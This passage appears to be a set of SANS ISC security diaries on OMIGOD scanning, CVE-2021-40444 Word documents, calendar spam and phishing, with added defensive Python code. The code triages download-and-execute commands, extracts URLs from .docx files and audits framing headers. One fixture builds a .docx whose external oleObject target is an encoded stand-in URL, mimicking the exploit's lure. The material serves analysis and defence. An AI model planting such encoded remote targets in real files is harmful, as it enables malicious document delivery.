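    return decoded if all(c.isprintable() or c in "\n\t" for c in decoded) else cmd


def triage_command(raw):
    """Classify a captured command and pull the download hosts out as IOCs."""
    cmd = maybe_base64(raw)
    # split the pipeline on ; && || | so each stage's first word (its verb) is examined
    stages = [s.strip() for s in re.split(r"\s*(?:;|&&|\|\||\|)\s*", cmd) if s.strip()]
    verbs = []
    for stage in stages:
        try:
            verbs.append(shlex.split(stage)[0])
        except (ValueError, IndexError):    # unbalanced quotes etc.: fall back to plain split
            verbs.append(stage.split()[0])
    urls = URL_RE.findall(cmd)
    hosts = sorted({u.split("://", 1)[1].split("/", 1)[0] for u in urls})
    vset = set(verbs)
    if vset & DOWNLOADERS and vset & RUNNERS:
        category = "download-and-execute"
    elif vset and vset <= RECON_VERBS:
        category = "recon"
    else:
        category = "other"
    return {"decoded": cmd, "category": category, "verbs": verbs, "urls": urls, "hosts": hosts}


if __name__ == "__main__":
    for raw in SAMPLE_COMMANDS:
        result = triage_command(raw)
        print(f"{result['category']:22} verbs={result['verbs']} hosts={result['hosts']}")
```

Grouping by the extracted hosts rather than by source IP is what separates "one botnet, many scanners" from "many actors": the diary's observation of a single download host behind 125 source addresses falls out of this directly.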
As far as scans against related ports (%%port:1270%%, %%port:5986%%, %%port:5987%%), below is a graph of the targets seeing scans on these ports:
It is interesting how the scans slowly increased in September before the vulnerability was announced; this is something that needs a bit more time to look into.
Almost exactly half of the scans to these ports come from researchers. The "Stretchoid" network appears to be most active, but others like Shodan, Internet Census, Onyphe, Cyber.casa, Internettl and so on are participating. Not all of these typically publish results, but for those that do, expect a lot of identical papers/news releases soon with headlines like "1000's of exposed hosts found vulnerable to OMIGOD" (if they didn't find much) or "10s of 1000s of exposed hosts found vulnerable to OMIGOD" (if they found more).
So far, there is a lot of recon happening. But this is a MUST PATCH NOW vulnerability, and if you are finding an exposed host inside Azure running OMI, assume compromise.
ISC Stormcast For Monday, September 20th, 2021 https://isc.sans.edu/podcastdetail.html?id=7678, (Mon, Sep 20th)
I created a video for the analysis I described in my last diary entry "Simple Analysis Of A CVE-2021-40444 .docx Document".
I also cover another sample in that video, one that is a bit harder to analyze (and has much lower detection rates on VT).
Remark that I always make sure that you can find the samples I analyze on Malware Bazaar too.
And here is the InQuest blog post I mention in the video: "Microsoft MSHTML Remote Code Execution Vulnerability".
Analyzing a malicious Word document like prod.docx that exploits %%cve:2021-40444%% is not difficult.
We need to find the malicious URL in this document. As I've shown before, this is quite simple: extract all XML files from the ZIP container (.docx files are OOXML files, that's a ZIP container with (mostly) XML files) and use a regular expression to search for URLs.
OOXML files contain a lot of legitimate URLs. Like schemas.microsoft.com. These can be filtered out with my tool re-search.py:
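An added example, not code from either diary, that combines the steps from this entry (extract the XML parts, regex for URLs, drop the schema hosts) with the two checks from the numeric-character-reference maldoc analysed earlier on this page (decode &#109;-style references before searching, and compare ZIP entry timestamps against the 1980-01-01 value Office writes). build_sample_docx() constructs an in-memory container for this purpose (192.0.2.10 is a documentation address, the relationship content is made up); the benign-host list is my own assumption, not re-search.py's filter.

```python
import io
import re
import zipfile

NCR_RE = re.compile(r"&#(x[0-9A-Fa-f]+|\d+);")
URL_RE = re.compile(r"[a-z][a-z0-9+.\-]*://[^\s\"'<>]+", re.IGNORECASE)
# Hosts present in every OOXML file and therefore not indicators (assumed list).
BENIGN_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org")
OFFICE_STAMP = (1980, 1, 1, 0, 0, 0)     # timestamp Office writes into ZIP entries


def decode_ncr(text):
    """Replace numeric character references (&#109; or &#x6d;) with the characters they encode."""
    def repl(m):
        ref = m.group(1)
        return chr(int(ref[1:], 16) if ref[0] in "xX" else int(ref))
    return NCR_RE.sub(repl, text)


def build_sample_docx():
    """Constructed in-memory OOXML container: Word-style entries stamped 1980-01-01 plus one
    relationships part rewritten by another tool (real timestamp) whose Target is written
    entirely as numeric character references."""
    target = "".join(f"&#{ord(c)};" for c in "http://192.0.2.10/word.html")
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"'
            f' Target="{target}" TargetMode="External"/></Relationships>')
    parts = [
        ("[Content_Types].xml", "<Types/>", OFFICE_STAMP),
        ("word/document.xml", "<w:document/>", OFFICE_STAMP),
        ("word/_rels/document.xml.rels", rels, (2021, 9, 16, 10, 0, 0)),
    ]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, stamp in parts:
            info = zipfile.ZipInfo(name, date_time=stamp)
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, data)
    return buf.getvalue()


def analyze_docx(data):
    """Decode NCRs in every XML part, collect non-schema URLs, and compare entry timestamps."""
    report = {"urls": [], "entries": [], "edited_entries": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            report["entries"].append((info.filename, info.date_time))
            if info.date_time != OFFICE_STAMP:
                report["edited_entries"].append(info.filename)   # touched by a non-Office tool
            if info.filename.endswith((".xml", ".rels")):
                text = decode_ncr(zf.read(info.filename).decode("utf-8", "replace"))
                for url in URL_RE.findall(text):
                    host = url.split("://", 1)[1].split("/", 1)[0]
                    if host not in BENIGN_HOSTS and url not in report["urls"]:
                        report["urls"].append(url)
    stamps = {stamp for _, stamp in report["entries"]}
    report["mixed_timestamps"] = len(stamps) > 1 and OFFICE_STAMP in stamps
    return report


if __name__ == "__main__":
    for key, value in analyze_docx(build_sample_docx()).items():
        print(f"{key}: {value}")
```

Searching the raw XML without decode_ncr() finds only the schema URLs, which is exactly the miss the diary describes; on a real file, `analyze_docx(open(path, "rb").read())` returns the decoded URLs together with the list of parts whose timestamp betrays post-editing.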
Did this threat really disappear? This isn't a brand new technique to deliver malicious content to mobile devices, but it seems that attackers have started new waves of spam campaigns based on malicious calendar subscriptions. Being a dad, you can imagine that I have always done security awareness with my daughters. Since they started using computers and the Internet, my message has always been the same: “Don't be afraid to ask me, there are no stupid questions or shame if you think you did something wrong”.
A few days ago, my youngest one came to me and told me she had the impression that her iPhone was hacked. After a quick check and reassuring her, I switched my dad's cap to the handler one and had a deeper look.
She told me that a pop-up was displayed on the screen and that she clicked on “Ok” too quickly. It was an unwanted calendar invitation and she subscribed to a spam feed. Her calendar quickly became flooded with events:
They are in French but easy to understand. They pretend to notify you about viruses found on the device and, using reminders, they keep the pressure on the victim:
If you visit the proposed link, you'll get more annoying ad pages, etc. Fortunately, nothing very malicious this time but, seeing the latest iOS vulnerabilities, this technique could be used to deliver exploits. To get rid of all those messages, you just need to unsubscribe from the calendar.
In conclusion, always read carefully all pop-ups displayed on your mobile phone (and obviously on any type of device!).
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Friday, September 17th, 2021 https://isc.sans.edu/podcastdetail.html?id=7676, (Fri, Sep 17th)
Phishing 101: why depend on one suspicious message subject when you can use many?, (Thu, Sep 16th)
There are many e-mail subjects that people tend to associate with phishing due to their overuse in this area. Among the more traditional and common phishing subjects, that most people have probably seen at some point, are variations on the “Your account was hacked”, “Your mailbox is full”, “You have a postal package waiting”, “Here are urgent payment instructions” and “Important COVID-19 information” themes.
Since security awareness courses often explicitly cover these, and e-mail messages with similar subjects are therefore usually classified by users as prima facie phishing attempts, one would reasonably expect that when a threat actor decides to use any such subject line, they would at least try to make the body of the e-mail a little more believable… However, as it turns out, this is not always the case.
We’ve recently received a phishing on our Handler e-mail address, which I found interesting, since its authors obviously decided to go the “all in” route when came to the use of multiple obviously suspicious message subjects, rather than try to make their creation more believable.
“But how could a single phishing e-mail have multiple subjects”, I hear you ask, dear reader.
Well, in this case, the phishing was a variation on the “You have undelivered e-mail messages waiting” theme, but instead of a list of urgent looking, yet believable subject lines, it contained pretty much the whole aforementioned set of suspicious-at-first-glance subjects, as you may see for yourself in the following image…
Apart from this rather interesting (and slightly funny) approach on the side of its authors, the e-mail was a rather low-quality example of phishing, its less than professional origins showing – among other places – in the fact that multiple links pointed to URLs that were obviously intended for previous recipients/recipients from other domains.
The only link that did lead to a phishing page pointed to an HTML document hosted on Google Firebase Storage that, when accessed, displayed a dynamically generated login prompt and tried to load a web page hosted on the domain to which the e-mail address belonged in an iframe below this prompt, in an attempt to make the login request look more believable (a technique that is fairly common, which provides another good reason why it’s advisable to use CSP/X-Frame-Options headers on one’s web servers).
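An added example (mine, not the handlers') of the server-side check the last sentence points at: given a response's headers, decide whether a foreign site can load the page in an iframe, honouring a CSP frame-ancestors directive over X-Frame-Options as browsers do. SAMPLE_RESPONSES is constructed.

```python
def frame_protection(headers):
    """Classify a response's framing protection: 'blocked' (no site may frame it),
    'restricted' (only listed or same-origin pages may), or 'open'. Header names are matched
    case-insensitively; a CSP frame-ancestors directive wins over X-Frame-Options."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [p.strip("'").lower() for p in parts[1:]]
            if sources == ["none"]:
                return "blocked"
            if "*" in sources or any(s in ("http:", "https:") for s in sources):
                return "open"                      # scheme-wide sources allow any origin
            return "restricted"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked"
    if xfo == "SAMEORIGIN":
        return "restricted"
    return "open"


# Constructed header sets for illustration.
SAMPLE_RESPONSES = {
    "no protection": {"Content-Type": "text/html"},
    "legacy header": {"X-Frame-Options": "DENY"},
    "csp": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp allows partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "xfo same origin": {"x-frame-options": "sameorigin"},
}


def audit(responses):
    """Map each named response to its framing classification."""
    return {name: frame_protection(hdrs) for name, hdrs in responses.items()}


if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_RESPONSES).items():
        print(f"{name:20} {verdict}")
```

In practice the headers come from a real response (for example `requests.get(url).headers`, which is case-insensitive already); a login page that classifies as "open" is the one the phishing kit above can embed under its fake prompt.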